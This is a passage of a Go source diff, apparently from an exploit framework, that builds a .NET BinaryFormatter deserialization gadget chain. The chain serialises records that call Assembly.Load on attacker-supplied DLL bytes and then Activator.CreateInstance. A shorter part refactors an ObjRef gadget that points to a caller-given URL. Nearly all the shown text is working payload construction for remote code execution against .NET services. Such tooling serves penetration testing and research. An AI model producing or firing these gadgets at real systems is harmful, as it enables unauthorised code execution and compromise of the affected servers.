+		PrimitiveTypeEnum: PrimitiveTypeEnum["Byte"],
+		Members:           string([]byte(DLLBytes)),
+	}
+	records = append(records, arraySinglePrimitiveID13)
+
+	// SystemClassWithMembersAndTypesID15
+	ID15MemberNames := []string{"Data", "UnityType", "AssemblyName"}
+	ID15MemberTypeInfo, ok := getMemberTypeInfo([]string{"String", "Primitive", "String"}, ID15MemberNames, []interface{}{
+		PrimitiveTypeEnum["Int32"],
+	})
+
+	if !ok {
+		return "", false
+	}
+	systemClassWithMembersAndTypesID15 := SystemClassWithMembersAndTypesRecord{
+		ClassInfo: ClassInfo{
+			ObjectID:    15,
+			Name:        "System.UnitySerializationHolder",
+			MemberCount: len(ID15MemberNames),
+			MemberNames: ID15MemberNames,
+		},
+		MemberTypeInfo: ID15MemberTypeInfo,
+		MemberValues: []interface{}{
+			BinaryObjectRecord{ObjectID: 33, Value: "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Reflection.Assembly,     mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
+			PrimitiveInt32(4),
+			BinaryObjectRecord{ObjectID: 34, Value: "System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089"},
+		},
+	}
+	records = append(records, systemClassWithMembersAndTypesID15)
+
+	// ASO O16
+	arraySingleObjectID16 := ArraySingleObjectRecord{
+		ArrayInfo: ArrayInfo{
+			ObjectID:    16,
+			MemberCount: 7,
+		},
+		Members: []interface{}{
+			MemberReferenceRecord{IDRef: 3},
+			ObjectNullRecord{},
+			MemberReferenceRecord{IDRef: 36},
+			ObjectNullRecord{},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(0)},
+			ObjectNullRecord{},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(1)},
+		},
+	}
+	records = append(records, arraySingleObjectID16)
+
+	// ClassWithIDRecord O17
+	classWithIDRecordID17 := ClassWithIDRecord{
+		ObjectID:   17,
+		MetadataID: 15,
+		MemberValues: []interface{}{
+			BinaryObjectRecord{
+				ObjectID: 37,
+				Value:    "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
+			},
+			4,
+			MemberReferenceRecord{IDRef: 34},
+		},
+	}
+	records = append(records, classWithIDRecordID17)
+
+	// ASO O18
+	arraySingleObjectID18 := ArraySingleObjectRecord{
+		ArrayInfo: ArrayInfo{
+			ObjectID:    18,
+			MemberCount: 7,
+		},
+		Members: []interface{}{ // interface{} can be replaced by any
+			MemberReferenceRecord{IDRef: 4},
+			ObjectNullRecord{},
+			MemberReferenceRecord{IDRef: 40},
+			ObjectNullRecord{},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(0)},
+			ObjectNullRecord{},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(1)},
+		},
+	}
+	records = append(records, arraySingleObjectID18)
+
+	// ClassWithIDRecord O19
+	classWithIDRecordID19 := ClassWithIDRecord{
+		ObjectID:   19,
+		MetadataID: 15,
+		MemberValues: []interface{}{
+			BinaryObjectRecord{
+				ObjectID: 41,
+				Value:    "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
+			},
+			4,
+			MemberReferenceRecord{IDRef: 34},
+		},
+	}
+	records = append(records, classWithIDRecordID19)
+
+	// ASO O20
+	arraySingleObjectID20 := ArraySingleObjectRecord{
+		ArrayInfo: ArrayInfo{
+			ObjectID:    20,
+			MemberCount: 7,
+		},
+		Members: []interface{}{ // interface{} can be replaced by any
+			MemberReferenceRecord{IDRef: 5},
+			ObjectNullRecord{},
+			MemberReferenceRecord{IDRef: 44},
+			ObjectNullRecord{},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(0)},
+			ObjectNullRecord{},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(1)},
+		},
+	}
+	records = append(records, arraySingleObjectID20)
+
+	// ClassWithIDRecord O21
+	classWithIDRecordID21 := ClassWithIDRecord{
+		ObjectID:   21,
+		MetadataID: 15,
+		MemberValues: []interface{}{
+			BinaryObjectRecord{
+				ObjectID: 45,
+				Value:    "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
+			},
+			4,                                // Val1 as int32
+			MemberReferenceRecord{IDRef: 34}, // Val2
+		},
+	}
+	records = append(records, classWithIDRecordID21)
+
+	// ASO O22
+	arraySingleObjectID22 := ArraySingleObjectRecord{
+		ArrayInfo: ArrayInfo{
+			ObjectID:    22,
+			MemberCount: 7,
+		},
+		Members: []interface{}{ // interface{} can be replaced by any
+			MemberReferenceRecord{IDRef: 6},
+			MemberReferenceRecord{IDRef: 48},
+			MemberReferenceRecord{IDRef: 49},
+			ObjectNullRecord{},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(0)},
+			ObjectNullRecord{},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(1)},
+		},
+	}
+	records = append(records, arraySingleObjectID22)
+
+	// ClassWithIDRecord O23
+	classWithIDRecordID23 := ClassWithIDRecord{
+		ObjectID:   23,
+		MetadataID: 15,
+		MemberValues: []interface{}{
+			BinaryObjectRecord{
+				ObjectID: 0x32,
+				Value:    "System.Linq.Enumerable+WhereSelectEnumerableIterator`2[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]",
+			},
+			4,
+			MemberReferenceRecord{IDRef: 34},
+		},
+	}
+	records = append(records, classWithIDRecordID23)
+
+	// ASO O24
+	arraySingleObjectID24 := ArraySingleObjectRecord{
+		ArrayInfo: ArrayInfo{
+			ObjectID:    24,
+			MemberCount: 7,
+		},
+		Members: []interface{}{ // interface{} can be replaced by any
+			MemberReferenceRecord{IDRef: 7},
+			ObjectNullRecord{},
+			MemberReferenceRecord{IDRef: 53},
+			ObjectNullRecord{},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(0)},
+			ObjectNullRecord{},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(1)},
+		},
+	}
+	records = append(records, arraySingleObjectID24)
+
+	// ClassWithIDRecord O25
+	classWithIDRecordID25 := ClassWithIDRecord{
+		ObjectID:   25,
+		MetadataID: 15,
+		MemberValues: []interface{}{
+			BinaryObjectRecord{
+				ObjectID: 54,
+				Value:    "System.Web.UI.WebControls.PagedDataSource",
+			},
+			4,
+			BinaryObjectRecord{
+				ObjectID: 55,
+				Value:    "System.Web, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",
+			},
+		},
+	}
+	records = append(records, classWithIDRecordID25)
+
+	// ASO O26
+	arraySingleObjectID26 := ArraySingleObjectRecord{
+		ArrayInfo: ArrayInfo{
+			ObjectID:    26,
+			MemberCount: 7,
+		},
+		Members: []interface{}{ // interface{} can be replaced by any
+			MemberReferenceRecord{IDRef: 8},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(0)},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(10)},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Bool"], Value: PrimitiveByte(0)}, // PrimitiveByte "renders" the same. This should get cleaned up later
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Bool"], Value: PrimitiveByte(0)},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Bool"], Value: PrimitiveByte(0)},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(0)},
+		},
+	}
+	records = append(records, arraySingleObjectID26)
+
+	// ClassWithIDRecord O27
+	classWithIDRecordID27 := ClassWithIDRecord{
+		ObjectID:   27,
+		MetadataID: 15,
+		MemberValues: []interface{}{
+			BinaryObjectRecord{
+				ObjectID: 57,
+				Value:    "System.ComponentModel.Design.DesignerVerb",
+			},
+			4,
+			BinaryObjectRecord{
+				ObjectID: 58,
+				Value:    "ISystem, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
+			},
+		},
+	}
+	records = append(records, classWithIDRecordID27)
+
+	// ASO O28
+	arraySingleObjectID28 := ArraySingleObjectRecord{
+		ArrayInfo: ArrayInfo{
+			ObjectID:    28,
+			MemberCount: 5,
+		},
+		Members: []interface{}{ // interface{} can be replaced by any
+			ObjectNullMultiple256Record{NullCount: 2},
+			MemberReferenceRecord{IDRef: 59},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(3)},
+			MemberReferenceRecord{IDRef: 11},
+			ClassWithIDRecord{
+				ObjectID:   29,
+				MetadataID: 15,
+				MemberValues: []interface{}{
+					BinaryObjectRecord{
+						ObjectID: 61,
+						Value:    "System.Runtime.Remoting.Channels.AggregateDictionary",
+					},
+					4,
+					BinaryObjectRecord{
+						ObjectID: 62,
+						Value:    "mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
+					},
+				},
+			},
+		},
+	}
+	records = append(records, arraySingleObjectID28)
+
+	// ASO O30
+	arraySingleObjectID30 := ArraySingleObjectRecord{
+		ArrayInfo: ArrayInfo{
+			ObjectID:    30,
+			MemberCount: 1,
+		},
+		Members: []interface{}{
+			MemberReferenceRecord{IDRef: 9},
+		},
+	}
+	records = append(records, arraySingleObjectID30)
+
+	// ASO O31
+	arraySingleObjectID31 := ArraySingleObjectRecord{
+		ArrayInfo: ArrayInfo{
+			ObjectID:    31,
+			MemberCount: 2,
+		},
+		Members: []interface{}{
+			MemberReferenceRecord{IDRef: 10},
+			MemberReferenceRecord{IDRef: 10},
+		},
+	}
+	records = append(records, arraySingleObjectID31)
+
+	// ASO O32
+	arraySingleObjectID32 := ArraySingleObjectRecord{
+		ArrayInfo: ArrayInfo{
+			ObjectID:    32,
+			MemberCount: 2,
+		},
+		Members: []interface{}{
+			BinaryObjectRecord{ObjectID: 65, Value: ""},
+			MemberReferenceRecord{IDRef: 65},
+		},
+	}
+	records = append(records, arraySingleObjectID32)
+
+	// SCWMT O36
+	ID36MemberNames := []string{"Delegate", "method0"}
+	ID36MemberTypeInfo, ok := getMemberTypeInfo([]string{"SystemClass", "SystemClass"}, ID36MemberNames, []interface{}{
+		"System.DelegateSerializationHolder+DelegateEntry",
+		"System.Reflection.MemberInfoSerializationHolder",
+	})
+
+	if !ok {
+		return "", false
+	}
+	systemClassWithMembersAndTypesID36 := SystemClassWithMembersAndTypesRecord{
+		ClassInfo: ClassInfo{
+			ObjectID:    36,
+			Name:        "System.DelegateSerializationHolder",
+			MemberCount: len(ID36MemberNames),
+			MemberNames: ID36MemberNames,
+		},
+		MemberTypeInfo: ID36MemberTypeInfo,
+		MemberValues: []interface{}{
+			MemberReferenceRecord{IDRef: 66},
+			MemberReferenceRecord{IDRef: 67},
+		},
+	}
+	records = append(records, systemClassWithMembersAndTypesID36)
+
+	// CW O40
+	classWithIDRecordID40 := ClassWithIDRecord{
+		ObjectID:   40,
+		MetadataID: 36,
+		MemberValues: []interface{}{
+			MemberReferenceRecord{IDRef: 68},
+			MemberReferenceRecord{IDRef: 69},
+		},
+	}
+	records = append(records, classWithIDRecordID40)
+
+	// CW O44
+	classWithIDRecordID44 := ClassWithIDRecord{
+		ObjectID:   44,
+		MetadataID: 36,
+		MemberValues: []interface{}{
+			MemberReferenceRecord{IDRef: 70},
+			MemberReferenceRecord{IDRef: 71},
+		},
+	}
+	records = append(records, classWithIDRecordID44)
+
+	// CW O48
+	classWithIDRecordID48 := ClassWithIDRecord{
+		ObjectID:   48,
+		MetadataID: 36,
+		MemberValues: []interface{}{
+			MemberReferenceRecord{IDRef: 72},
+			MemberReferenceRecord{IDRef: 73},
+		},
+	}
+	records = append(records, classWithIDRecordID48)
+
+	// CW O49
+	classWithIDRecordID49 := ClassWithIDRecord{
+		ObjectID:   49,
+		MetadataID: 36,
+		MemberValues: []interface{}{
+			MemberReferenceRecord{IDRef: 74},
+			MemberReferenceRecord{IDRef: 75},
+		},
+	}
+	records = append(records, classWithIDRecordID49)
+
+	// CW O53
+	classWithIDRecordID53 := ClassWithIDRecord{
+		ObjectID:   53,
+		MetadataID: 36,
+		MemberValues: []interface{}{
+			MemberReferenceRecord{IDRef: 76},
+			MemberReferenceRecord{IDRef: 77},
+		},
+	}
+	records = append(records, classWithIDRecordID53)
+
+	// CW O59
+	classWithIDRecordID59 := ClassWithIDRecord{
+		ObjectID:   59,
+		MetadataID: 4,
+		MemberValues: []interface{}{
+			MemberReferenceRecord{IDRef: 78},
+			MemberReferenceRecord{IDRef: 79},
+		},
+	}
+	records = append(records, classWithIDRecordID59)
+
+	// SCWMT O66
+	ID66MemberNames := []string{"type", "assembly", "target", "targetTypeAssembly", "targetTypeName", "methodName", "delegateEntry"}
+	ID66MemberTypeInfo, ok := getMemberTypeInfo([]string{"String", "String", "Object", "String", "String", "String", "SystemClass"}, ID66MemberNames, []interface{}{
+		"System.DelegateSerializationHolder+DelegateEntry",
+	})
+
+	if !ok {
+		return "", false
+	}
+	systemClassWithMembersAndTypesID66 := SystemClassWithMembersAndTypesRecord{
+		ClassInfo: ClassInfo{
+			ObjectID:    66,
+			Name:        "System.DelegateSerializationHolder+DelegateEntry",
+			MemberCount: len(ID66MemberNames),
+			MemberNames: ID66MemberNames,
+		},
+		MemberTypeInfo: ID66MemberTypeInfo,
+		MemberValues: []interface{}{
+			BinaryObjectRecord{ObjectID: 80, Value: "System.Func`2[[System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
+			MemberReferenceRecord{IDRef: 62},
+			ObjectNullRecord{},
+			MemberReferenceRecord{IDRef: 62},
+			BinaryObjectRecord{ObjectID: 82, Value: "System.Reflection.Assembly"},
+			BinaryObjectRecord{ObjectID: 83, Value: "Load"},
+			ObjectNullRecord{},
+		},
+	}
+	records = append(records, systemClassWithMembersAndTypesID66)
+
+	// SCWMT O67
+	ID67MemberNames := []string{"Name", "AssemblyName", "ClassName", "Signature", "Signature2", "MemberType", "GenericArguments"}
+	ID67MemberTypeInfo, ok := getMemberTypeInfo([]string{"String", "String", "String", "String", "String", "Primitive", "SystemClass"}, ID67MemberNames, []interface{}{
+		PrimitiveTypeEnum["Int32"],
+		"System.Type[]",
+	})
+
+	if !ok {
+		return "", false
+	}
+
+	systemClassWithMembersAndTypesID67 := SystemClassWithMembersAndTypesRecord{
+		ClassInfo: ClassInfo{
+			ObjectID:    67,
+			Name:        "System.Reflection.MemberInfoSerializationHolder",
+			MemberCount: len(ID67MemberNames),
+			MemberNames: ID67MemberNames,
+		},
+		MemberTypeInfo: ID67MemberTypeInfo,
+		MemberValues: []interface{}{
+			MemberReferenceRecord{IDRef: 83},
+			MemberReferenceRecord{IDRef: 62},
+			MemberReferenceRecord{IDRef: 82},
+			BinaryObjectRecord{ObjectID: 86, Value: "System.Reflection.Assembly Load(Byte[])"},
+			BinaryObjectRecord{ObjectID: 87, Value: "System.Reflection.Assembly Load(System.Byte[])"},
+			8,
+			ObjectNullRecord{},
+		},
+	}
+	records = append(records, systemClassWithMembersAndTypesID67)
+
+	// CW O68
+	classWithIDRecordID68 := ClassWithIDRecord{
+		ObjectID:   68,
+		MetadataID: 66,
+		MemberValues: []interface{}{
+			BinaryObjectRecord{ObjectID: 88, Value: "System.Func`2[[System.Reflection.Assembly, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
+			MemberReferenceRecord{IDRef: 62},
+			ObjectNullRecord{},
+			MemberReferenceRecord{IDRef: 62},
+			MemberReferenceRecord{IDRef: 82},
+			BinaryObjectRecord{ObjectID: 91, Value: "GetTypes"},
+			ObjectNullRecord{},
+		},
+	}
+	records = append(records, classWithIDRecordID68)
+
+	// CW O69
+	classWithIDRecordID69 := ClassWithIDRecord{
+		ObjectID:   69,
+		MetadataID: 67,
+		MemberValues: []interface{}{
+			MemberReferenceRecord{IDRef: 91},
+			MemberReferenceRecord{IDRef: 62},
+			MemberReferenceRecord{IDRef: 82},
+			BinaryObjectRecord{ObjectID: 94, Value: "System.Type[] GetTypes()"},
+			BinaryObjectRecord{ObjectID: 95, Value: "System.Type[] GetTypes()"},
+			8, // Corresponds with Val6 of the referenced object
+			ObjectNullRecord{},
+		},
+	}
+	records = append(records, classWithIDRecordID69)
+
+	// CW O70
+	classWithIDRecordID70 := ClassWithIDRecord{
+		ObjectID:   70,
+		MetadataID: 66,
+		MemberValues: []interface{}{
+			BinaryObjectRecord{ObjectID: 96, Value: "System.Func`2[[System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
+			MemberReferenceRecord{IDRef: 62},
+			ObjectNullRecord{},
+			MemberReferenceRecord{IDRef: 62},
+			BinaryObjectRecord{ObjectID: 98, Value: "System.Collections.Generic.IEnumerable`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
+			BinaryObjectRecord{ObjectID: 99, Value: "GetEnumerator"},
+			ObjectNullRecord{},
+		},
+	}
+	records = append(records, classWithIDRecordID70)
+
+	// CW O71
+	classWithIDRecordID71 := ClassWithIDRecord{
+		ObjectID:   0x47,
+		MetadataID: 0x43,
+		MemberValues: []interface{}{
+			MemberReferenceRecord{IDRef: 0x63},
+			MemberReferenceRecord{IDRef: 0x3e},
+			MemberReferenceRecord{IDRef: 0x62},
+			BinaryObjectRecord{ObjectID: 0x66, Value: "System.Collections.Generic.IEnumerator`1[System.Type] GetEnumerator()"},
+			BinaryObjectRecord{ObjectID: 0x67, Value: "System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]] GetEnumerator()"},
+			8, // Corresponds with referenced, like classWithID18
+			ObjectNullRecord{},
+		},
+	}
+	records = append(records, classWithIDRecordID71)
+
+	// CW O72
+	classWithIDRecordID72 := ClassWithIDRecord{
+		ObjectID:   0x48,
+		MetadataID: 0x42,
+		MemberValues: []interface{}{
+			BinaryObjectRecord{ObjectID: 0x68, Value: "System.Func`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
+			MemberReferenceRecord{IDRef: 0x3e},
+			ObjectNullRecord{},
+			MemberReferenceRecord{IDRef: 0x3e},
+			BinaryObjectRecord{ObjectID: 0x6a, Value: "System.Collections.IEnumerator"},
+			BinaryObjectRecord{ObjectID: 0x6b, Value: "MoveNext"},
+			ObjectNullRecord{},
+		},
+	}
+	records = append(records, classWithIDRecordID72)
+
+	// CW O73
+	classWithIDRecordID73 := ClassWithIDRecord{
+		ObjectID:   0x49,
+		MetadataID: 0x43,
+		MemberValues: []interface{}{
+			MemberReferenceRecord{IDRef: 0x6b},
+			MemberReferenceRecord{IDRef: 0x3e},
+			MemberReferenceRecord{IDRef: 0x6a},
+			BinaryObjectRecord{ObjectID: 0x6e, Value: "Boolean MoveNext()"},
+			BinaryObjectRecord{ObjectID: 0x6f, Value: "System.Boolean MoveNext()"},
+			8, // Corresponds with referenced, like classWithID18
+			ObjectNullRecord{},
+		},
+	}
+	records = append(records, classWithIDRecordID73)
+
+	// CW O74
+	classWithIDRecordID74 := ClassWithIDRecord{
+		ObjectID:   0x4a,
+		MetadataID: 0x42,
+		MemberValues: []interface{}{
+			BinaryObjectRecord{ObjectID: 0x70, Value: "System.Func`2[[System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
+			MemberReferenceRecord{IDRef: 0x3e},
+			ObjectNullRecord{},
+			MemberReferenceRecord{IDRef: 0x3e},
+			BinaryObjectRecord{ObjectID: 0x72, Value: "System.Collections.Generic.IEnumerator`1[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
+			BinaryObjectRecord{ObjectID: 0x73, Value: "get_Current"},
+			ObjectNullRecord{},
+		},
+	}
+	records = append(records, classWithIDRecordID74)
+
+	// CW O75
+	classWithIDRecordID75 := ClassWithIDRecord{
+		ObjectID:   0x4b,
+		MetadataID: 0x43,
+		MemberValues: []interface{}{
+			MemberReferenceRecord{IDRef: 0x73},
+			MemberReferenceRecord{IDRef: 0x3e},
+			MemberReferenceRecord{IDRef: 0x72},
+			BinaryObjectRecord{ObjectID: 0x76, Value: "System.Type get_Current()"},
+			BinaryObjectRecord{ObjectID: 0x77, Value: "System.Type get_Current()"},
+			8, // Corresponds with referenced, like classWithID18
+			ObjectNullRecord{},
+		},
+	}
+	records = append(records, classWithIDRecordID75)
+
+	// CW O80 DONE
+	classWithIDRecordID80 := ClassWithIDRecord{
+		ObjectID:   0x4c,
+		MetadataID: 0x42,
+		MemberValues: []interface{}{
+			BinaryObjectRecord{ObjectID: 0x78, Value: "System.Func`2[[System.Type, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Object, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]]"},
+			MemberReferenceRecord{IDRef: 0x3e},
+			ObjectNullRecord{},
+			MemberReferenceRecord{IDRef: 0x3e},
+			BinaryObjectRecord{ObjectID: 0x7a, Value: "System.Activator"},
+			BinaryObjectRecord{ObjectID: 0x7b, Value: "CreateInstance"},
+			ObjectNullRecord{},
+		},
+	}
+	records = append(records, classWithIDRecordID80)
+
+	// CW O81
+	classWithIDRecordID81 := ClassWithIDRecord{
+		ObjectID:   0x4d,
+		MetadataID: 0x43,
+		MemberValues: []interface{}{
+			MemberReferenceRecord{IDRef: 0x7b},
+			MemberReferenceRecord{IDRef: 0x3e},
+			MemberReferenceRecord{IDRef: 0x7a},
+			BinaryObjectRecord{ObjectID: 0x7e, Value: "System.Object CreateInstance(System.Type)"},
+			BinaryObjectRecord{ObjectID: 0x7f, Value: "System.Object CreateInstance(System.Type)"},
+			8, // Corresponds with referenced, like classWithID18
+			ObjectNullRecord{},
+		},
+	}
+	records = append(records, classWithIDRecordID81)
+
+	// CW O82
+	classWithIDRecordID82 := ClassWithIDRecord{
+		ObjectID:   0x4e,
+		MetadataID: 0xf,
+		MemberValues: []interface{}{
+			BinaryObjectRecord{ObjectID: 0x80, Value: "System.ComponentModel.Design.CommandID"},
+			4,
+			MemberReferenceRecord{IDRef: 0x3a},
+		},
+	}
+	records = append(records, classWithIDRecordID82)
+
+	// ASO O79
+	arraySingleObjectID79 := ArraySingleObjectRecord{
+		ArrayInfo: ArrayInfo{
+			ObjectID:    0x4f,
+			MemberCount: 2,
+		},
+		Members: []interface{}{
+			MemberReferenceRecord{IDRef: 0x82},
+			MemberPrimitiveTypedRecord{PrimitiveTypeEnum: PrimitiveTypeEnum["Int32"], Value: PrimitiveInt32(8192)},
+		},
+	}
+	records = append(records, arraySingleObjectID79)
+
+	//SCWMT O130
+	ID130MemberNames := []string{"_a", "_b", "_c", "_d", "_e", "_f", "_g", "_h", "_i", "_j", "_k"}
+	ID130MemberTypeInfo, ok := getMemberTypeInfo([]string{"Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive", "Primitive"}, ID130MemberNames, []interface{}{
+		PrimitiveTypeEnum["Int32"],
+		PrimitiveTypeEnum["Int16"],
+		PrimitiveTypeEnum["Int16"],
+		PrimitiveTypeEnum["Byte"],
+		PrimitiveTypeEnum["Byte"],
+		PrimitiveTypeEnum["Byte"],
+		PrimitiveTypeEnum["Byte"],
+		PrimitiveTypeEnum["Byte"],
+		PrimitiveTypeEnum["Byte"],
+		PrimitiveTypeEnum["Byte"],
+		PrimitiveTypeEnum["Byte"],
+	})
+
+	if !ok {
+		return "", false
+	}
+	systemClassWithMembersAndTypesID130 := SystemClassWithMembersAndTypesRecord{
+		ClassInfo: ClassInfo{
+			ObjectID:    130,
+			Name:        "System.Guid",
+			MemberCount: len(ID130MemberNames),
+			MemberNames: ID130MemberNames,
+		},
+		MemberTypeInfo: ID130MemberTypeInfo,
+		MemberValues: []interface{}{
+			PrimitiveInt32(1959924499), //  expected hex ref just in case I screwed this up: 13 13 d2 74
+			PrimitiveInt16(15086),      //  expected hex ref ee 2a
+			PrimitiveInt16(4561),       // expected hex ref d1 11
+			PrimitiveByte(0x8b),
+			PrimitiveByte(0xfb),
+			PrimitiveByte(0x00),
+			PrimitiveByte(0xa0),
+			PrimitiveByte(0xc9),
+			PrimitiveByte(0x0f),
+			PrimitiveByte(0x26),
+			PrimitiveByte(0xf7),
+		},
+	}
+	records = append(records, systemClassWithMembersAndTypesID130)
+
+	// FINI
+	for _, record := range records {
+		recordString, ok := record.ToRecordBin()
+		if !ok {
+			return "", false
+		}
+		finalGadget += recordString
+	}
+	finalGadget += string(byte(RecordTypeEnumMap["MessageEnd"]))
+
+	return finalGadget, true
+}
+
 func CreateDataSetXMLDiffGram(program string, args string) (string, bool) {
 	name0 := random.RandLettersRange(3, 9)
 	name1 := random.RandLettersRange(3, 9)
@@ -1100,43 +2020,19 @@ func CreateVeeamCryptoKeyInfo(url string, formatter string) (string, bool) {
 }
 
 func CreateObjectRef(url string, formatter string) (string, bool) {
-	secondClassName := "System.Runtime.Remoting.ObjRef"
-	firstClassName := "System.Exception"
-
-	secondMemberNames := []string{"url"}
-	firstMemberNames := []string{"ClassName"}
-
-	secondMemberTypes := []string{"String"}
-	firstMemberTypes := []string{"SystemClass"}
-
-	var secondMemberValues []interface{}
-	secondMemberValues = append(secondMemberValues, BinaryObjectRecord{ObjectID: 3, Value: url})
-
 	var firstMemberValues []interface{}
-	firstMemberValues = append(firstMemberValues, MemberReferenceRecord{IDRef: 2})
-
 	var firstAdditionalInfo []interface{}
+	firstClassName := "System.Exception"
 	firstAdditionalInfo = append(firstAdditionalInfo, "System.Runtime.Remoting.ObjRef")
-
+	firstMemberValues = append(firstMemberValues, MemberReferenceRecord{IDRef: 2})
+	firstMemberNames := []string{"ClassName"}
+	firstMemberTypes := []string{"SystemClass"}
 	firstClassInfo := ClassInfo{
 		ObjectID:    1,
 		Name:        firstClassName,
 		MemberCount: len(firstMemberNames),
 		MemberNames: firstMemberNames,
 	}
-
-	secondClassInfo := ClassInfo{
-		ObjectID:    2,
-		Name:        secondClassName,
-		MemberCount: len(secondMemberNames),
-		MemberNames: secondMemberNames,
-	}
-
-	secondMemberTypeInfo, ok := getMemberTypeInfo(secondMemberTypes, secondMemberNames, nil)
-	if !ok {
-		return "", false
-	}
-
